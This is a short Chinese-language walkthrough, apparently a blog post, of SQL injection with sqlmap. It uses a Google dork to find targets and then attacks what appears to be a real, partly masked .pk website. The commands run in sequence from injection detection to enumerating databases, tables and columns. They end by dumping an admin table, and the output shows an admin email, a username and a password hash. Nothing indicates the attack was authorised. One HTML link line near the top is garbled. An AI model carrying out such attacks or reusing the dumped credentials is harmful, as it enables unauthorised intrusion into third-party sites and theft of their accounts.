使用sqlmap进行试验:
<a href="尊重他人,即尊重自己" target="_blank" rel="nofollow">http://www.baidu.com/">尊重他人,即尊重自己</a>
Google Dorks:
这次使用:
inurl:.course.php?id=16
- 对目标网站进行查询:
sqlmap.py -u http://www.xxxx/course.php?id=16
//sqlmap -V 1.0.11,会生成相关文件,包含payload以及注入类型
参数介绍:
Parameter: id (GET),注入参数为GET注入:
注入类型有:
boolean-based blind //基于布尔的盲注,也就是可以根据返回页面判断条件真假的注入
error-based //报错型注入
time-based blind //基于时间延迟注入
UNION query //可联合查询注入此外还有一种为:
stacked queries SQL injection //可多语句查询注入
the back-end DBMS is MySQL,back-end DBMS: MySQL >= 5.0使用数据库为MYSQL,版本为5.x
web application technology: PHP 5.3.29//Web应用程序技术
2.得到数据库:
sqlmap.py -u http://www.xxx.org.pk/course.php?id=16 --dbs
[]efnypvon_icd_db
[]information_schema
3.web当前使用的数据库
sqlmap.py -u http://www.xxxx/course.php?id=16 --current-db
current database: 'efnypvon_icd_db'
4.web数据库所使用的账户
sqlmap.py -u http://www.xxx.pk/course.php?id=16 --current-user
current user: 'efnypvon_icd_usr@localhost'5.具体查看某一数据库:
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db --tables
6.查看表的字段
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin --columns
7.得到字段内容:
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin "fEmail,fPassword,fUserName,last_admiin,superadmin" --dumpinfo@xxxx.pk
icdmaster
223880689d78a4d2c2e84607f13715ee
2016-11-30 09:15:28
thats all :D